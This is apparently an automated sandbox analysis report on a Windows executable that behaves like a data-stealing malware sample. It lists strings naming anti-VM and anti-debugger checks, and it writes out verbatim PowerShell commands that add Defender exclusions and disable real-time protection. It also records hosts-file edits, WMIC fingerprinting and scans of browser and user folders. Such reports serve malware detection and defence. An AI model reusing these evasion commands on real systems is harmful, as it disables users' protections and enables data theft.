              Source: file.exeBinary or memory string: andcontentCutmediaMusicmediaPhotomediaVideomediaPausefolderOpenviewZoomInvisibilityvolumeDownvolumeMuteboldItalicBoldItalicFYNE_CACHEvmwaretrayxenservicevmwareusermegadumperscyllahidemcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootShowWin
              Source: file.exeBinary or memory string: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dlltext/plainuser32.dllFyne ErrorFYNE_SCALERightShiftRightSuperdwmapi.dllexecerrdotSYSTEMROOT for type cancel.svgdelete.svgsearch.svgfolder.svgupload.svglogout.svgmenuExpandcontentCutmediaMusicmediaPhotomediaVideomediaPausefolderOpenviewZoomInvisibilityvolumeDownvolumeMuteboldItalicBoldItalicFYNE_CACHEvmwaretrayxenservicevmwareusermegadumperscyllahidemcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootShowWindowsystemdataLockFileExWSASocketWChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtrahttp2debugcrypto/tlsimage: NewConnectionimage/webpimage/jpegUser-AgentRST_STREAMEND_STREAMSet-Cookie stream=%dset-cookieuser-agentkeep-alive:authorityconnectionHost: %s
              Source: file.exeBinary or memory string: account.svgradioButtoncontentCopycontentRedocontentUndomailComposemailForwardmediaRecordmediaReplayarrowDropUpviewRefreshviewRestoreviewZoomFitviewZoomOutinputRadiuslineSpacingheadingText[no events]EnumWindowsvboxservicecodecrackertotalav.comadaware.comProcess
              Source: file.exeBinary or memory string: authservicevmwareservicejoeboxcontrolprocesshackerhttp debuggerextremedumperprotection_idscanguard.compcprotect.comus.norton.comkaspersky.combullguard.comzonealarm.comdalTLDpSugct?GetTempPath2WModule32NextWRtlGetVersionGunjala_GondiMasaram_GondiMende_KikakuiOl
              Source: file.exeBinary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocsGODEBUG m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal file://LeftAltPATHEXTnumber confirmcheckedwarningarrowUphistorydesktopstorageaccountpressedsuccessregularRegularControlregeditollydbgdf5servvmusrvcqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe proavg.comCaption%.2f GB\\.\UNCFloats:AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaavx512fos/execruntimetls3desNRGBA64UpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailername %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTcharsetnil keyfeatherIntegerFreeSidSleepExHeadingRawHTML%s%s {
              Source: file.exeBinary or memory string: tPATHEXTnumber confirmcheckedwarningarrowUphistorydesktopstorageaccountpressedsuccessregularRegularControlregeditollydbgdf5servvmusrvcqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe proavg.comCaption%.2f GB\\.\UNCFloats:
              Source: file.exeBinary or memory string: nloadcomputer%-13s %qvmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversaleset.com-CommandDisabled0.0.0.0 USERNAMEfinishedwsaioctlacceptexArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiragan
              Source: file.exeBinary or memory string: eteexec: numberdeletesearchfolderuploadlogoutbuttonorangeyellowpurpleerror_Italic%w: %sImage x32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidra-ForceattribGetACPCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydia
              Source: file.exeBinary or memory string: sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=level 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameRegDeleteKeyWRegEnumValueW in host namecheck-box.svgfile-text.svgmail-send.svgvolume-up.svgsearchReplacecontentRemovedocumentPrintmediaSkipNextarrowDropDownvisibilityOffvgauthservicevmwareservicejoeboxcontrolprocesshackerhttp debuggerextremedumperprotection_idscanguard.compcprotect.comus.norton.comkaspersky.combullguard.comzonealarm.comdalTLDpSugct?GetTempPath2WModule32NextWRtlGetVersionGunjala_GondiMasaram_GondiMende_KikakuiOld_Hungariangocacheverifyinstallgoroothtml/templatetlsmaxrsasizeSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAuthorizationCache-ControlLast-ModifiedAccept-RangesIf-None-Match[FrameHeader accept-rangesauthorizationcache-controlcontent-rangeif-none-matchlast-modifiedFQDN too longsocks connectReset ContentLoop Detectedfield name %qimage/svg+xmlPlatformErrorErrorCode(%d)translations/filter methodDestroyWindowError help:
              Source: file.exeBinary or memory string: m=nil base hangupkilledlistensocketEscapeReturnInsertDeleteexec: numberdeletesearchfolderuploadlogoutbuttonorangeyellowpurpleerror_Italic%w: %sImage x32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidra-ForceattribGetACPCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidirdtscppopcntcmd/gonetdnsRGBA64Gray16activeclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectPragmasocks Locked%s: %snormalradiussimple\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007\u000b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f\u007ftoml: \"""""KeyEndGetAcesendtoMarkerOffsetfile[]NumbersqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexVideos
              Source: file.exeBinary or memory string: BecauseCayleysCconintCedillaDiamondDownTeeElementImpliesLeftTeeNewLineNoBreakNotLessOverBarProductUpArrowUparrowangrtvbangzarrasympeqbacksimbecausebemptyvbetweenbigcircbigodotbigstarbnequivboxplusccupssmcemptyvcirscircoloneqcongdotcudarrlcudarrrcularrpcurarrmdbkarowddaggerddotseqdemptyvdiamonddigammadotplusdwangleeqcolonequivDDgesdotogtquestgtrlessharrcirintprodisindotlarrbfslarrsimlbrksldlbrksluldrdharlesdotolessdotlessgtrlesssimlotimesltquestluruharmalteseminusdunapproxnaturalnearrownexistsnotinvanotinvbnotinvcnotnivanotnivbnotnivcnpolintnpreceqnsqsubensqsupensubsetnsucceqnsupsetnvinfinnvltrienvrtrienwarrowolcrossorderoforslopepertenkplanckhpluscirplussimplustwoprecsimquatintquesteqrarrbfsrarrsimrbrksldrbrkslurdldharrealinerotimesruluharsearrowsimplussimrarrsubedotsubmultsubplussubrarrsuccsimsupdsubsupedotsuphsolsuphsubsuplarrsupmultsupplusswarrowtopforktriplustritimeuparrowuwanglevzigzagzigrarrfonnapado-hansdo-hantjy-hansjy-hantmn-hansmn-hantnp-hansnp-hantpx-hanspx-hantsp-hanssp-hantzh-hanszh-hantzo-hanszo-hantpolytonan-hansan-hantarevmdaak-hansak-hantsn-hanssn-hantprovencuu-hansuu-hantue-hanspdh.dll_pragmapragma _txlockSHA-224SHA-256SHA-384SHA-512Ed25519MD5-RSAserial:eae_prkanswers{{end}} actioncommandoperandabl1943akuapemalalc97arevelaarkaikabalankabauddhabohoricemodenggrclassgrmistrhepburnitihasalaukikalemosinltg1929ltg2007metelkomonotonpahawh2pahawh3pahawh4sursilvsutsilvvaidika%s-%s%sAEsmallOEsmall001.000001.001001.002001.003crimsondarkreddimgraydimgreyfuchsiahotpinkmagentaoldlaceskybluethistleInstAltInstNopalt -> nop -> any -> EllipseEndPageFillRgnIsChildSetMenuSetRect_accessctime64wcsncpywcsrchrnil TLS2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavegb18030logicalcskoi8rkoi8-rudos-874tis-620chinesegb_2312cn-big5cseuckrksc5601unicode]?)(.*)GB18030GoString01234567beEfFgGvThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOrundll32icon.pnggo-builddisabledtruncateFullPath48828125infinitystrconv.parsing ParseIntFuncTypestruct {nil PoolscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheckrunnable procid rax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdown Cause:KP_EnterRightAltCapsLockmenu.svginfo.svgfile.svghelp.svghome.svglist.svggrid.svgdocumentquestionmailSendfileTextsettingsvolumeUpdownloadcomputer%-13s %qvmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversaleset.com-CommandDisabled0.0.0.0 USERNAMEfinishedwsaioctlacceptexArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiavx512bwavx512vlgo/typesnet/httpgo
              Source: file.exe, 00000000.00000002.1491354674.0000022DD4A63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exeJump to behavior
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Modifies the hosts file
              Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get NameJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\fyne VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Epic Games VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Minecraft VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Downloads VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Documents\My Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Documents\My Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Documents\My Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Downloads VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Documents\My Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Documents\My Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Documents\My Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Epic Games VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\OneDrive VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Default\OneDrive VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Minecraft VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Downloads VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Documents\My Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Documents\My Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Documents\My Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Documents\My Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\Public\Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\BXAJUJAOEO VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\BXAJUJAOEO VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\LIJDSFKJZG VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\LFOPODGVOH VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\LIJDSFKJZG VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\SNIPGPPREP VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Epic Games VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\ZIPXYXWIOY VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Minecraft VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\LFOPODGVOH VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\LHEPQPGEWF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\ZIPXYXWIOY VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\LIJDSFKJZG VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\HQJBRDYKDE VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\LFOPODGVOH VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\LHEPQPGEWF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\LIJDSFKJZG VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\My Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\My Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\OneDrive VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Downloads VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\OneDrive VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Documents VolumeInformationJump to behavior
